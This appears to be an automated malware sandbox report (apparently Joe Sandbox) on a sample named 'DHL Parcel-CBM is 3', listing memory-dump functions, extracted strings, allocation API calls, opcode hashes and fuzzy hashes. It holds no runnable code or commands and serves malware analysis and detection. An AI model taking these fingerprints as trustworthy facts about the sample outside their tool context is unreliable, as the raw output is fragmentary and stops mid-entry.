Source File: 00000000.00000002.2116882730.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_67a0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: a8201554d6a6be5a5d874ed37f1777772c47165fdceeeaa1c6f3270e2525875d
Instruction ID: 20b2bb4befdd99f090d84e0f3a0a18f269789ffece0ccd483232691aaf1c2288
Opcode Fuzzy Hash: a8201554d6a6be5a5d874ed37f1777772c47165fdceeeaa1c6f3270e2525875d
Instruction Fuzzy Hash: 0F110B75D003099FDB10DFAAC884A9EFBF5FF48320F148429D419A7250CB755945CFA1

Function 06779098 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06779106

Memory Dump Source

Source File: 00000000.00000002.2116804438.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6770000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d2d16022eb0f0d8293fb10d39e715184dda8ff98f85947b0cbdbf6f5e49f2776
Instruction ID: 0bdb6a2c2f505689adfd2fba653f35a5664ae77c44d4ff495b5d2ddec6cd6ca9
Opcode Fuzzy Hash: d2d16022eb0f0d8293fb10d39e715184dda8ff98f85947b0cbdbf6f5e49f2776
Instruction Fuzzy Hash: 011137769002499FCF10DFAAC845AEEBFF9EF88320F148419E519A7250CB759954DFA0

Function 065C0460 Relevance: 1.5, Strings: 1, Instructions: 224COMMON

Download Yara Rule

Strings

4'eq, xrefs: 065C068A

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: 4'eq
API String ID: 0-1552367303
Opcode ID: 0984d98d549a09fc6fd81024319d7601b70ac5827cf58299ddc4f118ba3e5767
Instruction ID: 9a36fe1a906e2e0d6f51bdcf5ac46f00695db1648765796dbe505a1ae2fcc4b5
Opcode Fuzzy Hash: 0984d98d549a09fc6fd81024319d7601b70ac5827cf58299ddc4f118ba3e5767
Instruction Fuzzy Hash: 13A1ED34A10219DFCB88EFA4D89499DB7B2FF88310F518159E415AB3A5DB71ED46CF80

Function 065C9760 Relevance: 1.5, Strings: 1, Instructions: 212COMMON

Download Yara Rule

Strings

(iq, xrefs: 065C98F9

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: (iq
API String ID: 0-3943945277
Opcode ID: afab2721ba3764bca293add9a5c4082711ddf7152b57186d9bed0bf0e1b1176c
Instruction ID: c77dd74fcf8d439478f7b42a6c4c7e663e0f085b31bd0341d640052d9b126341
Opcode Fuzzy Hash: afab2721ba3764bca293add9a5c4082711ddf7152b57186d9bed0bf0e1b1176c
Instruction Fuzzy Hash: AB717D75E006098FCB94DFA9C9406AEB7F6BFC4320F24846DE559A7354DB30AE01CB91

Function 065E2BF8 Relevance: 1.4, Strings: 1, Instructions: 178COMMON

Download Yara Rule

Strings

TJjq, xrefs: 065E2D5B

Memory Dump Source

Source File: 00000000.00000002.2116236055.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: TJjq
API String ID: 0-2687929720
Opcode ID: 12f52cc57bac20310f16b4354f72fee085aec2ecc67ed9c853fe120b845d59bb
Instruction ID: fc20876f9257706f2d165e08fa6bc6204b442f869d0b171edbd355b4e0df4375
Opcode Fuzzy Hash: 12f52cc57bac20310f16b4354f72fee085aec2ecc67ed9c853fe120b845d59bb
Instruction Fuzzy Hash: 197109B4E002089FDB44DFA9D8446DEBBB6FF8D304F20806AE905A7359DB389A45DF51

Function 065E2C08 Relevance: 1.4, Strings: 1, Instructions: 171COMMON

Download Yara Rule

Strings

TJjq, xrefs: 065E2D5B

Memory Dump Source

Source File: 00000000.00000002.2116236055.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: TJjq
API String ID: 0-2687929720
Opcode ID: f95d6a3c8b9cf66d2d51585502dacf8b83aa1113f9a6f58302d8501b0e47693a
Instruction ID: 0468b8459aee4fbacd4824681bce51026dfcfb86ec2421bc8866310a76347dcc
Opcode Fuzzy Hash: f95d6a3c8b9cf66d2d51585502dacf8b83aa1113f9a6f58302d8501b0e47693a
Instruction Fuzzy Hash: C67108B4E00208DFDB44EFA9D48469EBBB6FF8D304F20806AE905A7359DB349A45DF51

Function 0675B748 Relevance: 1.4, Strings: 1, Instructions: 162COMMON

Download Yara Rule

Strings

(iq, xrefs: 0675B7BC

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: (iq
API String ID: 0-3943945277
Opcode ID: c346a0c6840e5e2bbdac0cf907cf68cf37f59a1bbbd933d9345598a0be9fe6cf
Instruction ID: d77335c2530b65315d28d7bc24cf7cb05963f925d82fba01e7e786457cf0c427
Opcode Fuzzy Hash: c346a0c6840e5e2bbdac0cf907cf68cf37f59a1bbbd933d9345598a0be9fe6cf
Instruction Fuzzy Hash: F7511431A046168FCB00DF68C85497AFBB5FF86320B168A9AE955DB282D730FC51CBD1

Function 0675A780 Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

piq, xrefs: 0675A830

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: piq
API String ID: 0-198074023
Opcode ID: 67144d2ff22629bb0f0ad78983c1edb3781a887da36d1726ccc06ca85e76602c
Instruction ID: e82cf2e9dc037ab3320222de04966e6f867d732eae2ac4148450b81195ab4662
Opcode Fuzzy Hash: 67144d2ff22629bb0f0ad78983c1edb3781a887da36d1726ccc06ca85e76602c
Instruction Fuzzy Hash: 60514E76600100AFCB469F98C815D6ABBB6FF8D31471684D8E209CF272DA32CC21EB51

Function 0675C620 Relevance: 1.4, Strings: 1, Instructions: 160COMMON

Download Yara Rule

Strings

,iq, xrefs: 0675C683

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: ,iq
API String ID: 0-1887606315
Opcode ID: 1b350369272b98f5e8d4ea56c58781bed6af87ae2831af383cd9041c78e5da79
Instruction ID: f0af8037675aee4d8c56486a1990960555c6a223ea9f0294d9ffbbbcea4a716b
Opcode Fuzzy Hash: 1b350369272b98f5e8d4ea56c58781bed6af87ae2831af383cd9041c78e5da79
Instruction Fuzzy Hash: EA518F357002148FCB05DF69D894AAEBBE6FF89310B1180A9EA05DB365DB71ED02CB91

Function 065C5178 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

(iq, xrefs: 065C52A4

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: (iq
API String ID: 0-3943945277
Opcode ID: 8e4bd46232b12a997500f12350cfe4eb9edfa7f9300765cb257935d9f804654a
Instruction ID: 5fad728e4e7c44b6860296364e23c40701714144d590489bf4a3e344663de4c3
Opcode Fuzzy Hash: 8e4bd46232b12a997500f12350cfe4eb9edfa7f9300765cb257935d9f804654a
Instruction Fuzzy Hash: B9517072704204AFCB469FA8D814D597FB6FF89320B16809AE605CF272DA36DC11DB91

Function 065C4128 Relevance: 1.4, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

4'eq, xrefs: 065C4162

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: 4'eq
API String ID: 0-1552367303
Opcode ID: 63f6ffec82102ff5dbd52d68d65051a4748bf396c81a539f444db4d55216c5bd
Instruction ID: e9f1527f0458c66aefd150c86ee19cdfbc35830fb04a6784bc26e8774d248f72
Opcode Fuzzy Hash: 63f6ffec82102ff5dbd52d68d65051a4748bf396c81a539f444db4d55216c5bd
Instruction Fuzzy Hash: 0C414D30B106198FCB84AFA8C8A4AAEB7B7BFC9710F10451DD402AB394DF749D06DB91

Function 027B0D9F Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

Teeq, xrefs: 027B0E8C

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: Teeq
API String ID: 0-348098666
Opcode ID: 14ba056fda4d94195d370eee4e4b22fbc35b62c5c42ec9f3ed536ef887f62de3
Instruction ID: f02968cb6db7eaf2d444da29535778ce5b6603cf808248167f1683f692fdc480
Opcode Fuzzy Hash: 14ba056fda4d94195d370eee4e4b22fbc35b62c5c42ec9f3ed536ef887f62de3
Instruction Fuzzy Hash: 67418B74B001059FDB45AFB9D8987AEBBF3AF89314F248429E406EB3A1DF759C018B51

Function 065C3B20 Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

4'eq, xrefs: 065C3BD7

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: 4'eq
API String ID: 0-1552367303
Opcode ID: 162ee5756265946d8cf2ce19f62293ea4eb5d495d2a6a2827b8e6dee33525a3b
Instruction ID: 80d074d3123751d4514c4640cb3f2cdd4383989a3cd905cf10ff204dc0cbe82b
Opcode Fuzzy Hash: 162ee5756265946d8cf2ce19f62293ea4eb5d495d2a6a2827b8e6dee33525a3b
Instruction Fuzzy Hash: 42414C757006149FD349DB68C855B2B7BA6BFC8714F208468E606CB3A2DE75EC42CBA1

Function 065C3B30 Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

4'eq, xrefs: 065C3BD7

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: 4'eq
API String ID: 0-1552367303
Opcode ID: 8bef678e3da7ffb479e583e42a752d37420fc41d90297c47a6fc8991ecf594d8
Instruction ID: 2c248833a9b8eb7ea483d10a96d55165a9659039cd07ab1d6c57cf68f5aeaf08
Opcode Fuzzy Hash: 8bef678e3da7ffb479e583e42a752d37420fc41d90297c47a6fc8991ecf594d8
Instruction Fuzzy Hash: CC313B75700A149FD348DB69C855B2B77A6FFC8714F108468E606CB3A2DE75EC42CB90

Function 065EF311 Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

4'eq, xrefs: 065EF359

Memory Dump Source

Source File: 00000000.00000002.2116236055.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: 4'eq
API String ID: 0-1552367303
Opcode ID: 8138f299ad300ac36f13f2ca94e1d2995ff1bbfae9817f57bc5e9b1106811925
Instruction ID: f960922af602492d4f953d57d222fa337903ae53ce8f86775c4fb8c25251a69c
Opcode Fuzzy Hash: 8138f299ad300ac36f13f2ca94e1d2995ff1bbfae9817f57bc5e9b1106811925
Instruction Fuzzy Hash: 5131A2367001149FCF499FA4D945DAABBB3FF8C320B1540A9E6069B3E1DA71DC02DB90

Function 027B0E28 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

Teeq, xrefs: 027B0E8C

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: Teeq
API String ID: 0-348098666
Opcode ID: c58adc9c422bd13cd67d87532a929cc85ed09e77ade91c4bd51b8eae2ba79c91
Instruction ID: 0614b1800d06542f89c0b3a2686ba50e932cee4e9cabace8040ee8b97a77e3eb
Opcode Fuzzy Hash: c58adc9c422bd13cd67d87532a929cc85ed09e77ade91c4bd51b8eae2ba79c91
Instruction Fuzzy Hash: 07317A74B005059FDB45AFB8C4987AEBBE3AF89710F248429E402EB3A0DF759C419B51

Function 065C411E Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

4'eq, xrefs: 065C4162

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: 4'eq
API String ID: 0-1552367303
Opcode ID: 785d7ae315c17ee02caba2220ab60a60efb0e98ff5bb21a65b7b5c5404f0a89f
Instruction ID: c2d410a2f13a3a011483269d726295fa85791197ab47e3479936f3ace0f84fc1
Opcode Fuzzy Hash: 785d7ae315c17ee02caba2220ab60a60efb0e98ff5bb21a65b7b5c5404f0a89f
Instruction Fuzzy Hash: 20215330B101199FDB98AB95CC65A6EB7E7BFC4710F10441DE406DB390CF749C069B91

Function 067AE490 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 067AE4FB

Memory Dump Source

Source File: 00000000.00000002.2116882730.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_67a0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 7a7de76b718329b1fafd361ef8d4ee980feb35763a46a938a9accd952d845c48
Instruction ID: b3316217cdfcda9a94ade03cf20ba43a4112201bc7ae551fa68e9fac91a8dc83
Opcode Fuzzy Hash: 7a7de76b718329b1fafd361ef8d4ee980feb35763a46a938a9accd952d845c48
Instruction Fuzzy Hash: 8B1137769002498FCB10DFAAC845BEEFBF5EF88320F148419D519A7250CB759944DBA0

Function 027B135D Relevance: 1.3, Strings: 1, Instructions: 38COMMON

Download Yara Rule

Strings

XPyq, xrefs: 027B1364

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: XPyq
API String ID: 0-2596165108
Opcode ID: 914b3bb67fff0fc7d618613b5b2fff4d78c42a7d83eb07104730ded5193c33a0
Instruction ID: cbb0520dabc78a3054336099940c020e55a7b00edc89f3bb502169b67af00610
Opcode Fuzzy Hash: 914b3bb67fff0fc7d618613b5b2fff4d78c42a7d83eb07104730ded5193c33a0
Instruction Fuzzy Hash: 7A017178A042098FCB41DF68D8959AEBFB1FF89314B6085A9D405A73A5DB309D06CF50

Function 069E784F Relevance: 1.3, Strings: 1, Instructions: 30COMMON

Download Yara Rule

Strings

,, xrefs: 069E851B

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 3dc323258b21bef5de93ad457910409e5d497eb5df5bd8013039f5e2f82367bd
Instruction ID: 111bed25ce2a62a9fb40c09456d14859c9888cd6ca3c7dc626cae0016ddce2a9
Opcode Fuzzy Hash: 3dc323258b21bef5de93ad457910409e5d497eb5df5bd8013039f5e2f82367bd
Instruction Fuzzy Hash: 1801DC7490422DCFEB61CFA0C844BE8BBB1AB0A304F1080EAD958A7250E7B65EC1DF40

Function 06A55FF0 Relevance: 1.3, Strings: 1, Instructions: 28COMMON

Download Yara Rule

Strings

y, xrefs: 06A548D6

Memory Dump Source

Source File: 00000000.00000002.2117325560.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a50000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: y
API String ID: 0-4225443349
Opcode ID: dd578a3c50fc4e67a1350173a07ff24e75cab6c409bc4596e3f6818c62028358
Instruction ID: a2753ed8a9ad10aa722f2c75afa9f9cd6653bff7ab5aea89dfd38e058e40079b
Opcode Fuzzy Hash: dd578a3c50fc4e67a1350173a07ff24e75cab6c409bc4596e3f6818c62028358
Instruction Fuzzy Hash: ED014F74A09218CFEBA4DF24C888B9AB7B1EB89314F1140D5E51D97345CB349EC5AF52

Function 069E8302 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

4, xrefs: 069E83FE

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: 663843ee4509ff42306e3b4ef8b800fb3ad888d48a9caff78c18a31427c59bfc
Instruction ID: c0f3c082cb31c14681ff2765c7dc8ca77020ebc305ec791009241d36070f6c2f
Opcode Fuzzy Hash: 663843ee4509ff42306e3b4ef8b800fb3ad888d48a9caff78c18a31427c59bfc
Instruction Fuzzy Hash: 2FF01D7090011DDFDB65DF50DA54B9DB7F5AF49304F0084DAD509AB240EB319E85CF41

Function 069E759C Relevance: 1.3, Strings: 1, Instructions: 24COMMON

Download Yara Rule

Strings

<, xrefs: 069E75EB

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: <
API String ID: 0-4251816714
Opcode ID: 477f40b1e5cf24f9f5affcb6707e40536c4d46aa1f821f30457e5d6bc1552b6f
Instruction ID: 54ee0eb00300697180e1edb6fcca623fc6ef8cb89c7c9a2e792f78621308809e
Opcode Fuzzy Hash: 477f40b1e5cf24f9f5affcb6707e40536c4d46aa1f821f30457e5d6bc1552b6f
Instruction Fuzzy Hash: 17F05871D0061AEADB229E50C8046DAF771FF85341F20C68AEC497B615EB30AB86DF91

Function 06A54872 Relevance: 1.3, Strings: 1, Instructions: 23COMMON

Download Yara Rule

Strings

y, xrefs: 06A548D6

Memory Dump Source

Source File: 00000000.00000002.2117325560.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a50000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: y
API String ID: 0-4225443349
Opcode ID: 473fa6bfe5d5ada73be1901493cf91116ada82ff2bd96b1e27d13602bd71b783
Instruction ID: 5343d865d9c2ee71de7b04b108a3d88527ef150a5853baffcb46d1fa02b1020b
Opcode Fuzzy Hash: 473fa6bfe5d5ada73be1901493cf91116ada82ff2bd96b1e27d13602bd71b783
Instruction Fuzzy Hash: B6F05E74A042188FEBA4DF28C888E9AB7B2EB89314F0081D5E51D97346CB349E85AF51

Function 067575B6 Relevance: 1.3, Strings: 1, Instructions: 20COMMON

Download Yara Rule

Strings

Teeq, xrefs: 067575E5

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: Teeq
API String ID: 0-348098666
Opcode ID: 128f6c5e1684404001373aa6a261915380e0dcadc4d2ed282ad91539e54cda06
Instruction ID: ea5a3b9bb4d8e58bec29f778d713e89f9ad43d5d8746b8aca0bdf3d42abc161e
Opcode Fuzzy Hash: 128f6c5e1684404001373aa6a261915380e0dcadc4d2ed282ad91539e54cda06
Instruction Fuzzy Hash: B8F074749112698FEB95DF68D844B9DB7B2BB48300F1081D5D40DA7355DA345E84DF60

Function 069E7E36 Relevance: 1.3, Strings: 1, Instructions: 19COMMON

Download Yara Rule

Strings

7, xrefs: 069E78F6

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: 7
API String ID: 0-1790921346
Opcode ID: 076b7946299da2259d7d6925ee34d99007f8bf7d0bc58ffbf713e465e3d8a61b
Instruction ID: c7e0227e59361c6a8f735bac3e8ff617f6f43c3324235b294d26c57a741ee5a4
Opcode Fuzzy Hash: 076b7946299da2259d7d6925ee34d99007f8bf7d0bc58ffbf713e465e3d8a61b
Instruction Fuzzy Hash: B9E0E57490522ECFEF61CF61C908BE9BBF6AB09305F1081AAC48967655D7784E89CF42

Function 065E7A95 Relevance: 1.3, Strings: 1, Instructions: 16COMMON

Download Yara Rule

Strings

L, xrefs: 065E8973

Memory Dump Source

Source File: 00000000.00000002.2116236055.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: L
API String ID: 0-2909332022
Opcode ID: 6b11308942058320288ca8d6c701fc5ab371fe342119424ba8809f67b8d34f48
Instruction ID: 401874137037a9d6dcce006e4abc3479f9d0c5eb02dc6af9c4accb818747a352
Opcode Fuzzy Hash: 6b11308942058320288ca8d6c701fc5ab371fe342119424ba8809f67b8d34f48
Instruction Fuzzy Hash: EBE07574D05218CFEFA9CF54D8487DDBB71BB09314F145496D509B2250D7741AC4CF65

Function 069E8320 Relevance: 1.3, Strings: 1, Instructions: 15COMMON

Download Yara Rule

Strings

4, xrefs: 069E83FE

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: a406e8647dffb72e329780bf4e0696da80e1b792f185d90cb881eeac62f9ac34
Instruction ID: c67e9a9ab77d3e11493745d2b9c4374fafd6126b377db75f40960af919a53309
Opcode Fuzzy Hash: a406e8647dffb72e329780bf4e0696da80e1b792f185d90cb881eeac62f9ac34
Instruction Fuzzy Hash: 21E0B674900119CFDB51CF54CA80A9AFBF5AB49304F04C59A9909AB341E771AE42CF80

Function 0675262C Relevance: 1.3, Strings: 1, Instructions: 14COMMON

Download Yara Rule

Strings

', xrefs: 06750630

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: '
API String ID: 0-1997036262
Opcode ID: 1691f9558498fa14d0867612e0311ea5ae13ba54fbed621258e8f0812417949e
Instruction ID: c2f1caebbdd83b6911f55c23534e46c6fd835a10c88b85f9f3a85a8e7d297589
Opcode Fuzzy Hash: 1691f9558498fa14d0867612e0311ea5ae13ba54fbed621258e8f0812417949e
Instruction Fuzzy Hash: 37E0E270905228CFEB62CF28CD58BAEBBB2FB49309F0056D5844966251C7B40AC8CE42

Function 069E78C8 Relevance: 1.3, Strings: 1, Instructions: 13COMMON

Download Yara Rule

Strings

7, xrefs: 069E78F6

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: 7
API String ID: 0-1790921346
Opcode ID: ea635de6f7a7fbc662dd468d5d9429b465e1bd83b9557468bd4951b074c0cb67
Instruction ID: 21e3513fd20e703db195bade5b49d2fe76369c1cc3e1457b7986d6c87b32ebb6
Opcode Fuzzy Hash: ea635de6f7a7fbc662dd468d5d9429b465e1bd83b9557468bd4951b074c0cb67
Instruction Fuzzy Hash: F1E0E27490922ECFEF20DF61CA08BD8BBF6AB0A305F1480A9C049A7251D3388F85CF41

Function 065E8578 Relevance: 1.3, Strings: 1, Instructions: 10COMMON

Download Yara Rule

Strings

_, xrefs: 065E85A0

Memory Dump Source

Source File: 00000000.00000002.2116236055.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: 11e1d124530ebac8ceec18cf46a16f1650445fe851f7b5dd66ebfbabcb97c5a4
Instruction ID: 01779f12d496bc8033beee35c3065c45a65ceb175df315b010ae8d4504314bd4
Opcode Fuzzy Hash: 11e1d124530ebac8ceec18cf46a16f1650445fe851f7b5dd66ebfbabcb97c5a4
Instruction Fuzzy Hash: 0BD06C74D023288BDBA4DB14C94469DB7B9BB09304F2041E9801CA2251C7355E80CF40

Function 0675060C Relevance: 1.3, Strings: 1, Instructions: 9COMMON

Download Yara Rule

Strings

', xrefs: 06750630

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: '
API String ID: 0-1997036262
Opcode ID: 2be76e229daa70f4ae1cb8bf869f9ed31c4febfbb928f0631dc8514077928829
Instruction ID: b21b5ab2f03bb7b29547ed0b0116ddaa0101d7dd97e32d8696dd517020b7e073
Opcode Fuzzy Hash: 2be76e229daa70f4ae1cb8bf869f9ed31c4febfbb928f0631dc8514077928829
Instruction Fuzzy Hash: AED0C970905519CFDB52DF28CD9479E7BB6FB09305F4056D49049A7211CB701E84CF42

Function 027B29D8 Relevance: .6, Instructions: 642COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25189fee3e9542866d99468afb9c026939d57368d17ebb4682ddb197f6304abc
Instruction ID: 3f7ea03b90da205065e8fbb5ac8df1e491f6628f2794a078a0ba8a488bfd792d
Opcode Fuzzy Hash: 25189fee3e9542866d99468afb9c026939d57368d17ebb4682ddb197f6304abc
Instruction Fuzzy Hash: 4E62E5B4902240CFE766DF19D688BA9BBF1BF45304F95C1A9E0154F76AC37AD889CB40

Function 065C4368 Relevance: .4, Instructions: 437COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e528df6bc99bb9467ed4de5f11d3b5845761aa8250f69e43b64c32c7137719d9
Instruction ID: 0cad237ede63b0b8d1eb817bd749be8754421401829e31db26e9b7ea25b9d14f
